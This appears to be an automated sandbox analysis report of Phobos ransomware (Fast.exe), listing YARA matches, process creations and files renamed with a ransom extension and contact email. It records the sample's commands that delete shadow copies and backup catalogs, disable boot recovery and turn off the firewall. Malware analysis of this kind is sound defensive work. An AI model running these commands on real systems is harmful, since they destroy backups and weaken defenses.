Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Context.cpp%s:%d WARNING: UNSUPPORTED: VkIndexType %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Context.cpp
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Sampler.hpp%s:%d WARNING: UNSUPPORTED: VkImageViewType %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: ..\..\third_party\swiftshader\src\Device\Blitter.cpp%s:%d WARNING: UNSUPPORTED: Blitter source format %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp%s:%d WARNING: UNSUPPORTED: polygon mode: %d
Source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | Binary string: =..\..\third_party\swiftshader\src\Device\Renderer.cpp
Source: classification engine | Classification label: mal100.rans.spre.adwa.evad.winEXE@29/162@0/0
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA3DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,2_2_00CA3DC0
Source: C:\Users\user\AppData\Local\Fast.exe | Code function: 14_2_000D3DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,14_2_000D3DC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe | Code function: 25_2_00203DC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,25_2_00203DC0
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA4DEE CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,FindCloseChangeNotification,2_2_00CA4DEE
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Users\user\AppData\Local\Fast.exe\:Zone.Identifier:$DATA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Users\user\Desktop\Fast.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\<<BID>>9AA40F1700000001
Source: C:\Users\user\Desktop\Fast.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\<<BID>>9AA40F1700000000
Source: Fast.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fast.exe | File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\desktop.ini
Source: C:\Users\user\Desktop\Fast.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Fast.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\Fast.exe | File read: C:\Users\user\Desktop\Fast.exe
Source: unknown | Process created: C:\Users\user\Desktop\Fast.exe C:\Users\user\Desktop\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | Process created: C:\Users\user\Desktop\Fast.exe C:\Users\user\Desktop\Fast.exe
Source: C:\Users\user\Desktop\Fast.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Users\user\Desktop\Fast.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall set opmode mode=disable
Source: unknown | Process created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknown | Process created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Users\user\AppData\Local\Fast.exe "C:\Users\user\AppData\Local\Fast.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe"
Source: C:\Windows\System32\vssadmin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\descript.ion.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\af.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\an.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ar.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ast.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\az.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ba.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\be.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\bg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\bn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ca.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\co.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\cs.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\cy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\de.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\da.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\el.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\en.ttt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\eo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\es.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\et.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\eu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ext.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\fa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\fi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\fr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\fur.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\fy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ga.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\gl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\he.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\hi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\hr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\hu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\hy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\id.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\io.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\is.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\it.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ja.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ka.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\kab.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\kaa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\kk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ko.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ku-ckb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ku.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ky.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\lij.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\lt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\lv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\mk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\mn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\mr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ms.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\nb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ne.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\nl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\nn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\pa-in.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\pl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ps.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\pt-br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\pt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ro.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ru.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\si.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sq.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sr-spc.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sr-spl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\sw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ta.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\tg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\th.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\tk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\tr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\tt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\ug.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\uk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\uz-cyrl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\uz.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\va.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\vi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\7-Zip\Lang\yo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
